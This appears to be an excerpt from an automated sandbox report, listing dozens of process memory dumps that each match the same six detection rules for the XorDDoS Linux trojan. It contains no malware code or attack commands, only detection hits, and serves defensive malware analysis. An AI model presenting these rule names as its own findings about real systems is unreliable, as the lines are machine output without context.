Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
